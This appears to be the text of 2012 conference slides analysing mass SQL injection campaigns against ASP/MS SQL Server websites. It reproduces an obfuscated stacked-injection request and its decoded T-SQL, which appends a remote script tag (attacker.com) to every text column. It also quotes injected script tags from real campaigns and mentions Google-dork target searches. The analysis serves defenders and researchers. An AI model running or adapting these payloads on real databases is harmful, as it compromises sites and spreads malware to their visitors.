Analysis of mass SQL injection attacks Miroslav Štampar ([email protected]) Analysis of mass SQL injection attacks Miroslav Štampar ([email protected])
May 13, 2015
Analysis of mass SQL injection attacks
Miroslav Štampar([email protected])
Analysis of mass SQL injection attacks
Miroslav Štampar([email protected])
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 2
FUD (Fear, Uncertainty, Doubt)“A new virus is making the rounds and is
wreaking havoc on the Internet”“Whatever language is used to write to the
database, all SQL databases use the same basic formulas for writing and retrieving data”
“Targets that bottleneck in the technology, making it platform-independent… Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else”
“...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs”
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 3
Google is (not) your friend (1)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 4
Google is (not) your friend (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 5
Google is (not) your friend (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 6
What's it all about?Platform dependent (IIS/ASP(.NET))DBMS dependent (Microsoft SQL Server)Highly automated (tool-based) approachPopular SQL enumeration tools with or without
Google search capability don't count (e.g. sqlmap, Havij, Pangolin)
Infection(s) counting in thousands of domains (not millions as previously believed)
Dummy as it can be (usually one request per target)
In short: malware distribution
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 7
Modus operandi
Get hands on couple of 1-day exploits Blindly inject SQL payload carrying malicious
content (<script>, <iframe>, etc.) into content tables of as much as possible vulnerable web servers
Leverage exploit(s) and/or user's lack of technical knowledge to install malware (spyware, trojans, etc.) to visitor's computer
Profit(???) - (DEFCON 18 – Garry Pejski: “My Life As A Spyware Developer”)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 8
Sample leveraged exploitsCVE-2012-4681 Oracle Java 7 Update 6CVE-2012-1889 Microsoft XML Core ServicesCVE-2012-1723 Java Runtime EnvironmentCVE-2012-0507 Java Runtime EnvironmentCVE-2011-3544 Java Runtime EnvironmentCVE-2011-2110 Adobe Flash PlayerCVE-2011-0611 Adobe Flash PlayerCVE-2010-3552 New Java Plug-inCVE-2010-0188 Adobe Readeretc.
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 9
Notable members (1)
Lilupophilupop (sl.php) "></title><script
src="http://lilupophilupop.com/sl.php"></script><!--
Nikjju (r.php) <script src=http://nikjju.com/r.php></script>
Robint (u.js) <script src=http://ww.robint.us/u.js></script>
LizaMoon (ur.php) </title><script src=http://lizamoon.com/ur.php></script>
Jjghui (urchin.js) </title><script src=http://jjghui.com/urchin.js></script>
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 10
Notable members (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 11
Notable members (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 12
Generic payload (obfuscated)
GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220............................................................5845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 13
Generic payload (decoded)
DECLARE @t VARCHAR(255), @c VARCHAR(255)
DECLARE table_cursor CURSOR FOR
SELECT a.name, b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) /* NTEXT, TEXT, NVARCHAR, VARCHAR */
OPEN table_cursor FETCH NEXT FROM table_cursor INTO @t,@c
WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR,['+@c+']))+''<script src=http://www.attacker.com/malicious.js></script>''')
FETCH NEXT FROM table_cursor INTO @t,@c
END
CLOSE table_cursor
DEALLOCATE table_cursor
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 14
Analysis (1)
Piggy backing (stacked) SQL injectionObfuscated SQL code (hex encoded)Decoded code dynamically executed with T-
SQL EXEC commandUsage of cursor for updateIterating over all tables / all text-like columnsAppending malicious content (e.g. <script src=...) to all matched column entries using UPDATE statement
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 15
Analysis (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 16
Analysis (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 17
Example (1) - FAIL
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 18
Example (2) - FAIL
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 19
Example (3) - FAIL
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 20
Example (4) – CLUSTER FAIL
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 21
Example (5) - SUCCESS
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 22
Example (6) - SUCCESS
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 23
Asprox (1)
Spam botnet used for phishing scams (>10K bots)
Developed over yearsInteresting update “msscntr32.exe” (SQL
attack tool)Google search for targets (e.g. inurl:".asp")Launch SQL injection attacks against resulting
pages
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 24
Asprox (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 25
CLI (1)
Standalone executableRare beast (Chinese underground forums?)Google search for targets (e.g.: inurl:".asp" inurl:"a=")
Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></script>)
Wild guess is that attackers are being paid for using the tool (backcall to *.cn/pay.asp?SN=...)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 26
CLI (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 27
Sample tool (1)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 28
Sample tool (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 29
Sample tool (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 30
Sample tool (4)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 31
Sample tool (5)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 32
Sample run (1)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 33
Sample run (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 34
Sample run (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 35
Sample run (4)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 36
Sample run (5)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 37
Sample run (6)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 38
Sample run (7)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 39
Sample run (8)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 40
Questions?